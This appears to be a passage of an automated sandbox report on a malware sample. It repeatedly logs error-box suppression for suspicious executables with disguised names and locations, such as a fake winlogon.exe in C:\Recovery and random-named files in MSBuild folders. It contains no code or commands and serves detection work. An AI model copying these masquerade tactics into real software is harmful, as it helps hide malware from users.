Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
